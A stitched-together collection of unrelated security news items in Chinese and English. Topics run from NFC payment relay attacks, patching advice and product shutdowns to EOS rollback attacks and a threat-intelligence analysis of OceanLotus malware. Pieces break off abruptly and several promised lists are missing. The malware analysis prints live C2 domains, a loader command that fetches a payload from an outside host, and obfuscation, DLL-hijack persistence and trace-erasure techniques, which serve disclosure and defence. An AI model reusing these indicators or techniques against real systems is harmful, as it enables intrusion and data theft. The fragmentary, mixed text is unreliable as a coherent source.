NFC支付中继攻击是一种利用NFC智能卡或移动支付系统与PoS或终端之间的桥梁实时提取数据的攻击。在这个过程中提取信息和在避免延迟的同时建立连接是最重要的部分。

我已经发布了关于NFC技术的一些介绍:

电话1(左图)靠近NFC卡，电话2(右图)靠近终端。当电话2接近终端时，它模拟NFC卡，当终端开始初始化通信过程时。首先终端向电话2发送命令询问它是什么类型的卡时，电话2通过WiFi将数据发送给电话1，而电话1“询问”智能卡同样的问题。智能卡做出应答，电话1接收这些信息并将其发送回电话2，然后电话2将电话1的信息发送给终端。基本上，电话1充当阅读器，电话2充当智能卡。

在DEF CON 25中，Haoqi Shan和Jian Yuan介绍了一种NFC中使用SDR(Software define - radio)的技术,实现建立了一个专用的连接，比在同一个WiFi网络中使用手机更快捷、更好的控制NFC信息的通信。

中继攻击与重放攻击的主要区别在于中继攻击必须在攻击者提取数据的同时进行;另一方面，重放攻击发生在攻击者从事件中提取信息并将其保存以便稍后使用第三方设备重放。考虑到这一点，我们知道我们至少需要两个设备来处理这个项目:

甚至我们可以把它们组合成一个继电器。在设备沟通方面，我们有不同的选择:

为了理解这个概念，我将使用两个Acr122u USB设备在同一台计算机上通过USB连接的“本地”中继。其中一个将充当PoS，另一个将模拟智能卡。所有的连接将由python脚本处理，我的笔记本电脑将成为它们之间的桥梁。

为了解如何设计一个简单的NFC嗅探器。并尝试阅读、查看和研究NFC标记。我可以跟踪这个通信过程，而不需要进行真正的测试。但是，请注意，在此过程中ATC将增加

为了完成这一任务，我使用的软件是 RFIDIot 库。具体来说，使用 pn532mitm.py 脚本

在视频中，我运行命令:

视频地址：https://youtu.be/ghl1yybbLAk

我们可以使用这些代码来实时更改数据，此外，我们还可以使用https://www.emvlab.org/tlvutils/

解码器中APDU命令，以便了解更多标记的含义。

原文链接：https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/

There are plenty of reasons not to upgrade your SQL Servers to a new version. Perhaps you know the system is working and don’t want to disrupt activity. Often we don’t want to take a chance that some change in functionality causes us issues. In many cases, the new functionality might not be used in your current system, and you don’t see the ROI for the cost of upgrades. Costs certainly are a concern as SQL Server has gotten more expensive across time. In all these cases, it makes sense to stay on your current version. Software Assurance might negate the upgrade cost in money, or even give you a reason to upgrade, but it doesn’t prevent any of the other time and resource costs.

Patches don’t cost money, however, and they are included in your cost. While I am nervous about applying patches right away, I do want to apply them at some point. If for no other reason, I do want to ensure I’m going to get into a position where I have to apply a patch to fix something or get support in an emergency and not have done any testing. I am more nervous now after the recent windows Fall Update issues , and definitely want to let others test patches for a month or two before I apply them. Thanks to those of you that patch early and report issues.

The exceptions I make here about avoiding patches are for older versions of SQL Server. If I’ve got systems that are out of mainstream support, I want them patched. At that point, only security patches are coming and if I get those, I need to apply them, which means I need to be sure all other patches are in place.

Apparently many of you think like me, but not enough of you. I ran across a post from Erik Darling looking at a cross section of their customers , who I’d like to think are slightly more on the ball than everyone else, but perhaps not. In any case, lots of SQL Server 2008 and SQL Server 2012 systems haven’t been patched, with R2 and 2014 not far behind. While I know some vendors make patching difficult for SQL Server DBAs, we ought to be pressuring them more and more, and even asking our management to do the same.

We ought to be patching systems on a regular basis. That’s a part of the software life cycle and until we find ways to write bulletproof software, we’re going to be patching. Microsoft is in the same situation as most of us, which is why they deliver patches regularly for SQL Server. They need to patch their Azure databases and ensure they are prepared for security issues.

Make a plan to test these patches on your systems and start implementing it. None of us wants to be caught in a situation where we have to apply a security patch to an older server next week and we have no plan for how to test the application. Perhaps even worse, none of us wants to have a data breach because we were afraid to apply a security patch *because* we didn’t have a test plan.

Steve Jones

Listen to the MP3 Audio ( 3.9MB) podcast or subscribe to the feed at iTunes and Libsyn .

Home security cameras are a booming business, but it's far from a sure thing. Camera maker Lighthouse has just announced that it's shutting down, so any Lighthouse cameras you may have around the house will stop working in just a few weeks. Luckily, the company is offering refunds on the hardware.

Like most modern home security cameras, the Lighthouse camera relies entirelyon cloud storage. That at least made a little more sense in the case of Lighthouse, which used the camera's time-of-flight sensor (similar to Google Project Tango) to map the frame in 3D. With cloud processing, the camera could tell the difference between a person and the flat image of a person on a TV. However, the company was slow to add features to the app, and a paid service tier never materialized. We know Lighthouse was actively working on improving the device as recently as early December, so the shutdown seems to have caught everyone by surprise.

The cloud service will shut down on January 15th, rendering the cameras little more than paperweights. If you have footage you'd like to save, make sure you export it before then. The $300 indoor-only cameras were sold on the Lighthouse website, Amazon, and HSN. Lighthouse has instructions on how to get your refund, but you'll need to return the (soon to be useless) camera along with proof of purchase. The device is still available on Amazon, but I assume that will change soon.Sometimes a good idea isn't enough to keep the lights on, or in this case, the Lighthouse.

Editor’s note: This is a continuation of a series of blog posts on container security at Google.

As a Google Kubernetes Engine (GKE) user, you already enjoy the choice of several operating system (OS) images for your nodes, which we maintain and update for you behind the scenes, notably Container-Optimized OS (COS) and Ubuntu. You bring your own container images for your workloads, based on your needs. Today, we’re expanding our support for container images as well, with managed base images that you can use as a starting point when building your applications.

At Google Cloud, we’ve long maintained base images as part of the infrastructure that powers hosted services such as Google App Engine. With managed base images, we’ll provide base images for these common OSes, and patch them automatically. As long as the FROM field in your Dockerfile points to `$distro:latest` from Cloud Marketplace , you know that these images have been remediated with the most recently available patches from upstream. That way, you can easily keep your images up-to-date, without having to pull from an unknown repository, or having to maintain the images yourself.

Managed base images deal with the fact that containers are often short-lived, and frequently re-deployed, making it difficult to follow best practices such as ensuring that your container image is built from up-to-date and trusted sources. A container bundles binaries and libraries together as part of the container image. Rather than pushing small changes to a running container, you instead rebuild and redeploy the whole image, including the base, binaries, and libraries. With managed base images, any processes that can take place passively, for example patching, are done on an ongoing basis, so that the latest patches will be picked up the next time you deploy.

Today, managed base images are available for the following distributions:

Managed base images follow security best practices―in addition to being maintained with regular patching and testing, they can be rebuilt from scratch reproducibly―by comparing them to the original source we can verify that no flaws were introduced.

Managed base images vs. distroless images

An alternative to managed base images is distroless images . These images contain only your application and its runtime dependencies, greatly reducing the potential attack surface. A package with a newly discovered vulnerability can’t affect you if you don’t have the package in the first place! Distroless images remove package managers, shells, or other programs you might find in a standard linux distribution, so that you’re focusing on what’s actually important: reducing the signal-to-noise ratio that vulnerability scanning usually generates, and leaving you less to maintain.

Both distroless and managed base images are good options for your containers. If you need a full Linux distribution, including features like a package manager or a shell, then managed base images are a good choice. If you want the most locked-down option, then distroless images might be a better choice. Read more about managed base images , and pull them directly from Cloud Marketplace .

Working with managed base images

If you decide to use a managed base image, you may notice that there are still some vulnerabilities when you scan these base images with Container Registry Vulnerability Scanning . That’s to be expected, and can happen for a variety of reasons:

Further, please note that although you’re pulling `$distro:latest`, this isn’t pulling the latest version of a distro, e.g., Ubuntu, but rather the latest from a particular version of a distribution, e.g., Ubuntu 16.04. This means you get security patches, but no unexpected new functionality.

CentOS support

Based on popular demand, we’re also introducing support for CentOS , with a managed base image. CentOS is a community-driven OS providing a robust base for building your containers.

The CentOS managed base image uses `yum` and `rpm` for package management, and these pull RPM files only over HTTPS connections. You can pull the CentOS base image directly from Cloud Marketplace .

To help you further secure your images, we’ve also published a new solution on image validation best practices as part of a CI/CD process. Since containers are meant to be immutable, they are constantly being rebuilt and redeployed. By having a straightforward, consistent CI/CD process, you can validate and restrict what ends up in your environment on an ongoing basis.

In a nutshell, here are the steps we recommend you take to validate your container images:

So, about this Internet of Things, uh, thing. There may be a slight problem.

As the world rushes to connect anything and everything to the Internet, the resulting explosion of IoT devices presents one of the most challenging and complicated threats that cyber security professionals have faced.

IoT devices are popping up everywhere in a mad rush for data. They’re on factory floors to help keep operations run smoother. They’re monitoring industrial facilities to stay ahead of any service interruptions. They’re keeping track of goods as they move through the supply chain. They’re embedded in our vehicles, controlling our home air conditioning and heating systems, and even delivering powerful features to our kids’ toys.

With so many devices to manage and jobs to do, the IoT (and its offshoot, the Industrial Internet of Things) has become increasingly dependent on software protocols to manage the complex web of messages moving back and forth. One of these, the publish-subscribe-based Message Queuing Telemetry Transport (or MQTT), is used for one-to-many machine-to-machine settings. Another, Constrained Application Protocol (or CoAP), enables communication with low-power nodes such as small field sensors.

Now, according to a report from Trend Micro , it appears that both of these protocols are frequently being compromised due to the way they’re deployed. In fact, Trend Micro found hundreds of thousands of MQTT and CoAP hosts all over the world that were reachable via public-facing IP addresses, potentially exposing millions of records to attackers. Most of these were in the U.S. and China, but vulnerable hosts were found in smaller numbers all over Europe and Southeast Asia. This is not a small-scale issue.

According to the report, Trend Micro also found a design issue in some devices that allows attackers to supply invalid data to end points. The resulting vulnerabilities can expose critical data for casual attackers to see. Denial-of-service attacks are also possible, as is a hacker taking full control of an IoT system.

And these attacks can happen faster than security teams can respond. A recent report from Arbor Networks found that it takes less than a day for vulnerabilities in new IoT devices to be targeted by malware, and less than five minutes for them to be subjected to brute force login attempts.

Some of these attacks could potentially play out to deadly effect in factory settings, as illustrated in this video . They can also threaten the safety of autonomous vehicles, allow bad guys to take control of industrial facilities, or expose consumers via the growing number of risks presented by smart devices operating in their homes .

And it gets even more personal that that: With growing numbers of Internet-connected toys hitting the market, even data about young children’s whereabouts has become fair game .

Focusing on the industrial, factory and supply chain settings, which is where the biggest impacts from IoT technologies can be found , one of the key cyber security technologies going forward will be artificial intelligence.

As a recent piece in TechHQ argues, the sheer number of IoT devices is too much for traditional cyber security approaches to contend with, while machine learning algorithms can learn what is “normal” IoT behavior and then identify deviations. By sending in algorithms to do what humans used to, cyber security teams can ensure there are digital eyes on a lot more end points.

But for many organizations, sizeable investments in AI can be daunting. Fortunately, Network World recently published a list of 10 common sense tips for minimizing IoT security vulnerabilities . One example from the list: “Gizmos that connect automatically to open Wi-Fi networks are a bad idea. Make sure they don’t do that.”

All of these developments taken together lead to an unavoidable conclusion: As so often has been the case with major technological advances, we may be getting a bit ahead of ourselves by eagerly adopting a technology whose implications we don’t fully understand. And this time, the technology will be truly ubiquitous, showing up in every part of our lives, and in every setting.

Maybe we might want to get the security right before going any further, because whereas a secure IoT has the potential to bring transformational benefits to just about every industry, hastily deployed IoT components that lack strong security will open up more holes than cyber security teams have ever seen.

Crypto startup TrustToken announced Wednesday that its smart contract has passed three independent security audits conducted by Certik, SlowMist and Zeppelin, with no vulnerabilities found.

Moreover, itsTrueUSD stablecoin has now exceeded $1.1 billion in monthly trading volume, with a $200 million market cap , according to the firm’s data.

As part of its efforts to maintain the stablecoin’s security, TrustToken is now storing the U.S. dollars backing the token in multiple third-party trust companies. Each trust company is regulated through the State of Nevada Financial Institutions Division.

The firm now intends to work with trust companies regulated by the Delaware Office of the State Bank Commissioner and the Ohio Department of Commerce as well.

As a result, it said, TrueUSD redemption will not be compromised by a single point of failure should any single institution have issues.

TrustToken CEO and co-founder Danny An explained that the company will continue to focus on regulatory compliance and transparency, adding:

Separately, the company announced it has appointed former DoorDash engineer Hendra Tjahayadi as its director of engineering.

Tjahayadi has previously worked with Lyft, Dropcam and Google, and will work on TrustToken’s infrastructure security and scalability, according to the company.

Green light image via Shutterstock

If you’ve read my columns over the past few years, you’ve seen a security operations effort I’ve been pushing called security operations and analytics platform architecture (SOAPA). I first conceived of SOAPA as an antidote for the existing security operations practice of relying on an army of independent and disconnected security tools.

This army formed over time as organizations added different security controls and threat detection systems. And while they didn’t mean to create an unmanageable monster, that’s what they got. Each system requires its own setup and ongoing management. Each one does its own alerting and reporting. Each one demands employee training, etc. Meanwhile, security operations is based on pivoting from one tool to the next and relying on humans to make sense of the whole enchilada.

SOAPA is meant to address this complexity with a tightly integrated security operations stack consisting of:

Looking forward to 2019, I see several industry initiatives and open-source software projects that have the potential to make significant contributions to SOAPA. Some of those I’m tracking include:

I’m tracking several other initiatives, but these are the ones that jump out at me. Are there others I should keep my eye on? Please let me know.

Coinbase recently moved 5% of all BTC, 8% of all ETH and 25% of all LTC in circulation (among many other assets) in what we believe is the largest crypto migration on record. Our VP of Security is publishing the case study below to shed light on the specific ways we build security into our platform at every stage ― as well as engage with the community around sharing best practices for crypto security.

In the world of cryptocurrency, security must be a core value and top priority of any organization looking to serve customers over the long-term. Today, we’re sharing what we learned from our recent migration of crypto with the broader ecosystem in an effort to build trust for the entire industry.

At Coinbase, our commitment to security is expressed in a number of ways, from consumer security protections to internal development practices to third-party audits and tests. Our most critical responsibility is the security of the assets that our customers entrust to us. The gold standard of cryptocurrency asset security is offline, or “cold,” asset storage. Coinbase stores 98% or more of our customer assets in our cold storage system. Coinbase’s cold storage has gone through a number of evolutions through the years as the cryptocurrency space has evolved and matured.

Last week we successfully completed an on-blockchain migration of approximately $5 Billion (as valued the week ending Dec. 7, 2018) of cryptocurrency from Generation Three to Generation Four of our cold storage infrastructure. To our knowledge, this is the largest movement of cryptocurrency (certainly in USD terms, potentially in absolute terms) ever undertaken.

Cold storage can cover a number of storage techniques, ranging from HSMs to bunkers in the Swiss Alps. Assets placed in cold storage are completely offline and disconnected from any automated system. As with many terms in a rapidly developing industry like cryptocurrency, there is no clear standard for cold storage.

Coinbase’s standard for truly cold storage is that multiple geographically separated humans in the real world should be forced to perform physical actions actions to enable a transaction after reviewing transaction details. If that isn’t true, we don’t think it’s actually cold storage.

Coinbase’s cold storage has been through a number of iterations over the last six years. The first version, as we’ve talked about previously , was keys in a safety deposit box.

While that was fine for back then, as asset values increased and cryptocurrencies started to diversify, we needed to build a system that ensured broad consensus on movements from cold storage and could flexibly support many types of assets. In our latest version , which initially rolled out with Coinbase Custody and now handles all cold storage at Coinbase, we start with a secure foundation with a highly controlled and audited key generation process and continue with a globally distributed key storage and transaction approval system.

This system protects against key loss, key misuse (including insider threat and application level attacks) and supports world class key governance and audit while being currency agnostic. That means we can store any cryptocurrency using the same system, without making compromises in the level of security provided to any single cryptocurrency.

The idea of moving $5 Billion on-blockchain was one we approached with a very high degree of caution. While we believe in the security of the blockchain, the number of moving parts combined with our absolute responsibility to ensure the security of funds in our custody meant that we needed to cover every possible scenario.

We began planning months before the actual move date and involved almost every team at Coinbase in the process. We conducted risk assessments, honed monitoring plans and conducted test migrations until we were positive that the live migration would go off without a hitch.

One of the risks we identified early on in the process was the potential for our migration to be mistaken for an exchange breach or a large trader preparing to sell a significant amount of cryptocurrency. Either way, we were worried that the market uncertainty would result in price movements. On the other side of the equation, we were worried that giving potential attackers too much notice would let them plan for and execute attacks during the migration. Once we were ready to conduct the migration, we put out a briefblog post to calm fears without giving away too much information about our plans. This piece helped steer a significant amount of the resulting discussion on online forums and in trade blogs ( like this one ).

After that blog post was out, we proceeded to restore our existing cold storage addresses one by one, waiting until the previous address had been swept to the new cold storage before moving the next address. This approach made the migration take longer (it lasted 4 working days), but resulted in much higher assurance that our customers’ funds were secure every step of the way.

In the end, what all this means is that we’re continuing to push the pace of the industry in providing secure, auditable, asset-agnostic offline storage for cryptocurrency. Our customers reap the rewards in terms of better security, more assurance and faster asset additions. This new cold storage system is a core part of our strategy to expand our asset offerings while never compromising on the level of security we provide our customers. If that sounds like an interesting set of challenges, we happen to be hiring …

The recording of my talk Security Considerations for Container Runtimes Dan Walsh, Red Hat ( @rhatdan )

Explain/demonstrates using Kubernetes with different security features for your container environment

With your free Red Hat Developer program membership, unlock our library of cheat sheets and ebooks on next-generation application development.

General Concept

Configuring CRI-O:

Building images with security in mind.

Advances in User Namespaces

Adtech cybersecurity company Devcon announced today that it has raised $4.5 million in seed funding.

Over the past couple of years, ad fraud has become a bigger concern in the industry , but Devcon co-founder and CEO Maggie Louie said most existing solutions focus on things like verifying ad quality and confirming that impressions aren’t coming from bots. Devcon, in contrast, functions more like “a Norton AntiVirus of adtech” preventing attempts by bad actors who are “using adtech as a catalyst to attack consumers and companies.”

In other words, Louie said Devcon works with ad networks and publishers to “eliminate 99 percent of the nefarious things that are making their way through the system.” It says it can block malicious ads on an individual basis, whether they include pop-ups and redirects or unauthorized tag injectors. Customers can then view the individually blocked ads and see where they came from, and there’s also a dashboard that shows how much money is being lost to fraud.

Louie pointed to the recent DOJ indictment of eight individuals allegedly involved in a digital ad fraud scheme as a sign that the issue is becoming more serious.

At the same time, she argued that this is a particularly challenging area for security, because there’s been “a lack of crossover between cybersecurity and ad ops,” leading to a dearth of “security people or cybersecurity people who understand adtech.”

In contrast, the Devcon team combines media veterans like Louie (who was recently vice president of audience at the Athens Banner-Herald and also worked at the Los Angeles Times) with “white hat” hackers like co-founder and CTO Josh Summitt (who was previously on the ethical hacking team at Bank of America). It’s also hired former FBI Cyber Squad Supervisor Michael F. D. Anaya as its head of global cyber investigations and government relations.

In fact, Devcon says it assisted law enforcement in the first-ever conviction for online ad theft and money laundering, which resulted in a four-year prison sentence.

Devcon was founded in Memphis, Tennessee but has since expanded its headquarters to Atlanta, and it was part of this year’s Techstars Barclay accelerator in London. The seed funding was led by Las Olas VC ― among other things, Louie said it will allow Devcon to further develop its machine learning technology to automatically identify emerging threats.

Lighthouse, the maker of a security camera with some sophisticated artificial intelligence capabilities , is closing its doors, citing a lack of commercial success for its first product. Lighthouse’s first product was unveiled back in May 2017, and it began selling in February of this year for $299 . The camera could perform facial recognition and, over time, learn the faces of familiar people in your home to help you tailor alert settings and better understand when you needed to actually pay attention to the video feed.

The product did, however, come with some drawbacks. It was $299, which was as expensive as the most pricey Nest camera. It also required a $10 subscription fee that was necessary to enable any of its promised AI features, making it a costly proposition for any customer. (Most modern security cameras offer better features with a subscription , but still work normally out of the box.)

Although Lighthouse arrived at a prime moment for AI in the home, it also happened to be going up against Amazon, Google, and established consumer electronics companies like Logitech and Netgear. Almost all of those companies, and especially Amazon and Google, began bundling AI features into existing camera lines, making Lighthouse’s product a tough sell from an unproven startup.

“I am incredibly proud of the groundbreaking work the Lighthouse team accomplished - delivering useful and accessible intelligence for our homes via advanced AI and 3D sensing,” writes CEO and co-founder Alex Teichman in a note on the company’s website . “Unfortunately, we did not achieve the commercial success we were looking for and will be shutting down operations in the near future. Customers, please check your email for refund process details.”

Microsoft today released a new portion of security updates for supportedwindows 10 versions.

RECOMMENDED: Click here to fix Windows errors and optimize system performance

The released patches are intended to close a security breach in Internet Explorer. The updates are:

To get these updates, openSettings- > Update &recovery and click on theCheck for Updatesbutton on the right. Alternatively, you can get them from the Windows Update online catalog .

网络犯罪越来越有创意。

12 月 14 日，美国一个网络安全博客 TrendMicro 发表了一篇文章说，有罪犯正在使用表情包植入木马程序来入侵人们的电脑。

传播的方法如下：木马传播者通过一个叫 bomber 的 Twitter 账号发布表情包图片。而这个图片中隐藏了 “ /print ”指令。当有网民把表情包保存到自己电脑后，表情包内的隐藏指令就会开始执行一系列操作，包括截屏受感染的电脑，然后从发布在 Pastebin 的一则帖子中获取命令和控制服务器所在的地址，将截屏内容发回给“黑客”。

根据恶意软件分析网站 Virus Total 的介绍，这个表情包传播木马始于今年 10 月，源头就是 Pastebin 上的那则帖子。

表情包内还会嵌入其他指令，例如用 “/processos” 获取当前运行应用和进程列表的，用 “/clip” 盗取用户剪贴板内容的，以及用 “/docs” 从特定文件夹检索文件名的。然后通通发回给“黑客”。

在这个恶意程序被发现后，目前 Twitter 已经封掉了 bomber 这个账号。

总的来说，它的木马程序危害并不算大，且只对有安全漏洞的电脑起效。但它新颖的入侵手段仍然让人很在意。在 Twitter 上，通过表情包诱人下载，真正做到了像特洛伊木马一样地入侵。而且，用社交网络传播也增强了木马的成功率――毕竟对杀毒软件来说这是一个可信任的网页。

同时，它的目的也很让人起疑――毕竟那个木马破坏性并不大，但很可能这只是用表情包传病毒的第一波尝试。

说起来， bomber 用来传播木马的表情包也略有深意。那是一张《黑客帝国》里戴墨镜的墨菲斯的照片。作为剧中反抗组织的首领，墨菲斯身上被黑客寄托了某种情怀。

而在互联网上，此前它一直作为一本正经给人忠告的表情包形象在网络上流传。这个表情包还有个著名的变种，就是 2012 年出现的猫咪墨菲斯。

当然啦，不论是墨菲斯的表情包还是墨菲斯猫的表情包，对于 Twitter 用户来说，今后看到 dank meme （还记得这个意思吗？陈词滥调的老表情包），可能都需要慎重下载了。

题图来自： imgflip

“Meme”（/mim/），“梗”、“包袱”、“表情包”的意思。我们用它来记录一些文化现象，有些事情光记录下来就很有意思。

编者按：本文来自36氪战略合作区块链媒体“ Odaily星球日报 ”（公众号ID：o-daily， APP下载 ）

遭受攻击的几款游戏基本为 EOS 头部较活跃的竞猜类游戏。据 PeckShield 报道，其中的竞猜类游戏 BetDice 近一周日均活跃度超 5,000 人，交易额也在 5,000 万 EOS 以上。

PeckShield 创始人蒋旭宪表示，这次攻击背后是同一个团伙或个人。攻击 BetDice 的账号 hnihpyadbunv 创建了账号 eykkxszdrnnc，用来攻击 EOSMax 与 BigGame。账号 eykkxszdrnnc 又创建了子账号 kfexzmckuhat 用来攻击 ToBet。攻击成功后，再频繁创建子账户转移所得资产。

对于这次攻击，蒋旭宪向 Odaily星球日报表示，ECAF 追回盗取的 EOS 预计难度比较大，目前已经牵涉到 1808 个账户， 数量还在增长中 。

PeckShield 安全人员认为，EOSMax、ToBet、BigGame 和 BetDice 这四款竞猜类游戏被攻击事件，均和 EOS Node 存在漏洞有关。

持有同样看法的还有 EOS MAX，据IMEOS.ONE 报道，EOS MAX发布公告，称是由于 EOS Node 存在漏洞导致，并非游戏合约存在漏洞。

据业内不具名人士向 Odaily星球日报透露，这次交易回滚攻击与项目方的 nodeos 开启了 speculative mode 有关，开发者需要关闭该 mode 来避免攻击（对于开启 speculative mode 的作用，可以简单理解为可以提升交易速度，但是安全性会降低）。

对于这次交易回滚攻击的具体过程， MEET.ONE 的负责人 Goh 向 Odaily 星球日报表示，认为此次攻击过程如下：

币乎的 “胖哥” 分享 了佳能和 MYKEY 技术团队对本次回滚攻击调查方式推演的一个推断：

攻击方式是抓住了 DAPP 节点读写没有分离的漏洞，黑客直接运用 DAPP 读的节点去发送交易，那么该节点会最早执行合约逻辑计算 DICE 结果，如果黑客赢那就不做任何操作，等该节点广播同步到块节点就赢了。如果黑客输了，黑客同时发送一笔转账操作到目前正出块主节点，让账号余额不足以完成先前的那笔交易，那么先前的那笔交易就会被废弃，那么黑客就不会输了。

综上运用的方式还是传统的方式：双花！

DAPP 应该自查一下是否讲读写分离以及读节点设置成 read-only。

目前，据 IMEOS.ONE 报道，此前因遭受交易回滚攻击而暂停运营的 EOSMax，经过团队调查、与 BP 商讨解决方案，已经成功修复问题，目前已恢复服务。 团队将采用读写分离的方式来修复该问题，读取采用 read-only 的节点，写入采用另一个节点以规避回滚交易漏洞。

此外，对于 TRUSTBET 遭受的重放攻击漏洞，PeckShield 安全人员认为这是一种最早出现于 EOS DApp 生态初期的攻击形态，由于开发者设计的开奖随机算法存在严重缺陷，使得攻击者可利用合约漏洞重复开奖，是一种较低级的错误。

对于这次攻击，MEET.ONE 的负责人 Goh 向 Odaily星球日报表示，这已经不是 EOS 第一次被攻击了，甚至攻击的手法和发现的漏洞都不算有技术难度。只能说 EOS 生态发展地非常快，但项目的研发能力和安全能力相对滞后。对于 EOS 上的项目而言， 生产环境就是最好的测试环境 ，不断地遇到问题后需要不断地迭代。”

纯白矩阵创始人吴啸向 Odaily 星球日报表示，EOS 的愿景是不错的，但是需要更加稳定可能才更适合开发者。目前 EOS 的机制设计方面存在隐患，比如可以替换合约，对开发者的权限限制不足。此外，EOS 还存在 BP 的反映时间长等问题。不过，最近 EOS 发布侧链，BM 又推出 wasm 解释器、扫码登录 PC 端的 Dapp，在安全方面会有所提升，会对 EOS 持续关注。

对于这次攻击，还有人从 EOS 生态的角度给出了观点。DappReview CEO 牛凤轩向 Odaily 星球日报表示，这是一起非常大的安全事故，但是从今天早上开始看到，节点和多个发生被攻击的游戏项目方开始合作，研究如何解决问题。而且，BetDice 还友好地提醒了自己的竞争对手。这些良性的行为对于 EOS 的生态建设很有帮助。

我是Odaily星球日报的齐明，探索真实区块链，日常喜欢和各路大神聊天。项目交流、爆料请加微信qingmoruoshui，烦请备注姓名、公司、职务。转载/内容合作/报道联系report@odaily.com；违规转载法律必究。

360威胁情报中心在近期对海莲花组织的持续跟踪过程中，发现其最新的攻击活动中使用的初始投放载荷文件和攻击利用技术与过去相比出现了一些新的变化，其近期的攻击目标包括国内某大型投资公司。

本报告对海莲花组织最新的攻击利用技术，攻击载荷，攻击事件的分析和披露，其主要发现如下：

海莲花组织依旧采用其惯用的鱼叉邮件攻击目标人员，并诱导其下载和执行相关诱导载荷文件。我们发现其近期利用亚马逊云托管相关的投放载荷文件，并在鱼叉邮件中附上云附件诱导目标人员点击下载。

诱导文件名称列表如下：

结合攻击目标、攻击时间及诱导文件名称，我们认为这可能是海莲花组织针对国内部分目标企业(如民营企业)的财务部门，企业部门管理人员和高管的发起的鱼叉攻击，由于时近年末，该组织采用了一些如部门工作总结、财务报告、人员加薪任命为诱导文件名称。

初始投放的诱导文件都是以zip或rar格式的压缩文件，其中包含的初始投放载荷呈多种利用形态，以下为具体的分析。

CACTUSTORCH框架是一个开源的javascript和VBScriptshellcode执行框架，海莲花组织基于该框架修改，并加入了代码混淆和另外的一些利用技巧。

例如对CreateObject的包裹混淆实现：

Chin函数会首先判断操作系统中安装的.NET版本，不同的版本加载不同的注入DLL版本：

对base64编码信息的混淆变换：

进行base64解码：

然后反序列化之后执行代码：

其中通过对Base64的数据解密如下：

其中包含一个C#实现的DLL (md5:b28c80ca9a3b7deb09b275af1076eb55)。该DLL主要是解密hta文件内容中的附加数据，并在内存中加载。其中被加载的DLL，从36361位置开始读取数据。

其中加载函数的参数说明如下：

X(279045859 , 36361 , 30 , 1639151 )

参数1：hta附加数据的解密密钥

参数2：hta附加数据的偏移

参数3：docx文件名的长度

参数4：从hta附加数据解密后的文件中，docx文件所在的文件偏移

替换掉” ”，”. ”，”,”为合法的base64字符（= / +）：

然后做base64解码，再做异或解密，传进来的密钥为：279045859 （0x10A1E6E3）

解密后的数据如下，其中包含附加的docx文件和文件名。

其将docx文件释放到temp并打开：

同时后台会执行loader程序，其为Denis家族。下图为shellcode入口：

海莲花组织将LNK文件伪装成如“2018年工作报告提纲2(第四稿).doc.lnk”的名称，其图标如下：

其中vbb.jpg是一个hta的文件，首先通过读取注册表HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\的路径是否存在，如果不存在的话，就为.NET 2.0的版本：

设置计划任务在30s后执行%appdata%\\mobsync.exe，每1h执行一次。

修改注册表键值，劫持SyncCenter.dll，当mobsync.exe进程启动时加载该DLL实现持久性：

最终直接执行shellcode代码：

在分析过程中，我们还发现了一个自解压文件格式的投放文件。其自解压的时候会通过regsvr32加载压缩包里的ocx文件，同时打开Report.docx文件。

打开的模糊doc文档如下：

ocx加载后会在C:\ProgramFiles\NLS_000001释放四个文件，并使用白利用技术加载同目录下的dbghelp.dll：

其中加载的恶意代码是海莲花常用的Denis木马。

木马连接的C2为nnggmpggmeggidggjlggmmggmiggnkggmlggjkggmhggmlggmiggjoggmcgg.ijmlajjp.karelbecker.com。

在投放的诱导压缩包“2018年工作报告提纲2(第四稿).rar”中所包含的docx文档使用了一种似乎目前尚未公开披露的在野攻击技术。

文档打开后，会弹出确认框。

其利用文档内嵌VisualStudio Tools for Office（VSTO）进行攻击。VSTO是新版Office中COM加载项的替代品（虽然后者仍然受支持）。但是，与COM加载项不同，VSTO需要安装特殊的运行时，默认情况下不会安装。

下图为诱导文档指向的vsto文件目录：

其指向的目录如下，值得说明的是，这个目录下问的目录及文件已经全部进行了系统文件隐藏处理，正常将其解压并不能看见该目录以及文件的存在。

其中 vsto文件首先调用Microsoft.Office.Compatible.dll

加载Microsoft.Office.Compatible.dll后，会分别执行两个函数，method_1主要为了执行木马，method_2主要为了打开文档文件。

两个函数均会通过method_0来获取customXml目录下的item1.xml和item2.xml来创建可执行文件，其通过获取对应的res编号来读取xml中的数据，并进行base64解码。

method_1主要是通过读取item1.xml的数据并解码，然后便开始创建进程并运行。

最后运行的Denis木马，回连C&C为nnggmpggmeggidggmiggjmggmbggjjggjmggmiggmkggnjggngggmeggmhgg.ijmlajjb.sorensanger.xyz。

method_2创建一个随机名称的docx文件，并将从item2.xml读取的数据进行解码后写入该文件，实际上该段数据为原来的word文件内容。

最后会将customXMLPart删除，也就是将原来涉及的调用vsto文件的xml进行删除操作，并对一些目录进行删除。其为了进行攻击痕迹抹除，并且试图将样本伪装成正常样本，逃避检测。

在分析过程中，我们发现海莲花组织使用多个白利用木马，并用于针对某大型民营投资公司的攻击事件中。

该DLL样本是Flash.exe的白利用文件，其编译时间为2018年10月9日，是攻击者最初使用的版本。

其使用base64编码附带的数据，如图：

然后执行如下图的shellcode地址：

0xfc8偏移处的数据传入sub_18函数里：

获取kernel32的基址：

获取一些基本函数的地址：

1、 VirtualAlloc

2、 VirtualFree

3、 VirtualProtect

4、 memcpy

其在内存中执行释放的H1g9Fjt5m.exe，并使用如下的调用参数：C:\Users\Administrator\Desktop\api\temp\royal\H1g9Fjt5m.exe -u https://ristineho.com/vii32.png

At SECOM , we perform many forms of social engineering attacks, from phishing to vishing and smishing as well as impersonation. All of these attacks are used regularly by actual attackers and should be tested as part of a robust security assessment in every organization. Small and large businesses alike are vulnerable to these attacks. If you are currently training and testing your employees against phishing and vishing , as you should be, we encourage you, in 2019, to test impersonation attacks as well .

The way SECOM describes an impersonation attack is the “practice of pretexting as another person with the goal of obtaining information or access to a person, company, or computer system.” There are a number of pretexts that work for these attacks that we have used on real engagements. Examples are a delivery person, tech support staff member, vendor like pest control or janitorial staff member, construction worker, and even local journalists. The idea is to test your employees’ ability to vet whether a person who actually walks into a building or other facility is supposed to be there or have access to whatever they are asking for.

It is important to test this attack vector , regardless of company size , because if your information is valuable enough, an attacker may use this vector. If your employees are not trained to defend against it, you could lose that valuable information which could have a negative impact to the business and your customers .

Story time. Here are a couple examples of impersonation attacks we have performed on real engagements, and what can be done to defend against them.

